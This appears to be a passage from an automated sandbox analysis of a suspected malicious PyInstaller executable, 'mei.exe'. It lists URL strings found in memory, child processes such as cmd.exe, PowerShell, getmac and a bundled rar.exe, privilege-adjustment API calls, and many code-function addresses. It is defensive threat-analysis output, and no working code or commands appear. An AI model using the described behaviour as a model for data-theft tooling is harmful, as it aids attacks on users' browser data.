              Source: mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906554913.000002E914B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyP
              Source: mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906189200.000002E914F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: mei.exe, 00000001.00000003.1798504535.000002E914189000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E9141C1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1783214649.000002E914189000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1821226094.000002E914A7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914189000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E914564000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788857455.000002E914189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: mei.exe, 00000001.00000003.1777251401.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1769987569.000002E9141A5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788371805.000002E914117000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914117000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1799659026.000002E914109000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788371805.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788687102.000002E914108000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: mei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: mei.exe, 00000001.00000003.1769987569.000002E9141A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1769987569.000002E9141A5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1761527994.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788857455.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91417B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1790066765.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819324595.000002E91417B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029582916.000002E913C72000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2028960937.000002E913C2B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031913351.000002E913C74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: mei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
              Source: mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp, mei.exe, 00000001.00000002.2039113179.00007FFDFB289000.00000004.00000001.01000000.00000011.sdmp | String found in binary or memory: https://www.openssl.org/H
              Source: mei.exe, 00000001.00000002.2030942122.000002E913490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: mei.exe, mei.exe, 00000001.00000002.2039190548.00007FFDFB6D8000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: https://www.python.org/psf/license/
              Source: mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: cmd.exe | Process created: 65

              System Summary

              Source: C:\Users\user\Desktop\mei.exe | Process created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue (12 identical entries)
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79DD2C0: CreateFileW, CloseHandle, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A0B57C: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitWindowsEx
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F716C
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F6220
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F0DE8
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313D7900
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E3A94
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E2254
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EA2E0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E1A34
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EE9E0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F649C
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E1C40
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E2D00
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E7B48
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EE360
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F6C20
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E3690
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F9EA8
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E1E44
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EDECC
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313D1EF0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E8580
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F1D94
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F45CC
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E5DE0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E2050
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F4130
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313D8F80
              Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E1830
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFAC718A0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFB287B30
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFB899F90
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1B0A50
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF211850
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A8290
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF200FC0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1FDE70
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF198F10
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1BBF40
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF19FD60
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1D7E10
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1E8DF0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1B7C90
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1E9CD0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF193CA0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A8CF0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF196D42
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1B2D20
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1ABB70
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF216BE0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1F1A80
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF209A70
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF224AB0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF19AAB0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1DCB50
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF19E980
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1EF890
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF2408A0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF196948
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1D5930
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1F8770
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1E87A0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF24F840
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A5850
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF192850
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF2246C0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1ED6A0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1CA6B5
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1DD700
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1BC720
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1BF570
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1C4610
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A25F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF199480
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1BB490
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1F94F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1DE4F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF194390
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1FF360
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1D3370
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF196400
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF2173F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1BD3F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF23E430
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF218430
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1B62C0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1B52D0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1AB310
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF204310
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1AC1C0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF231250
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A70C0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1F40D0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1940F0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A1120
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003D7200
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00355DC0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311AD7
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00336290
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311EE7
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311D98
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE0038A740
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311172
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311B54
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311CC1
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00348AA0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311A0F
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003116FE
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00318BE0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE0037CDA0
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE0031143D
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311613
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003117F8
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00350F90
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE0031262B
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00312716
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311181
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003124EB
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE0031149C
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00383330
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003113DE
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00327630
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE003121D5
              Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311C12
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 56_2_00007FFD9AC917D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A241CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79EAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A118A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A0190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79E67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A286D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A02700
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A00710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A17660
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79EF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79ED458
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A05468
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79EC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79DD2C0
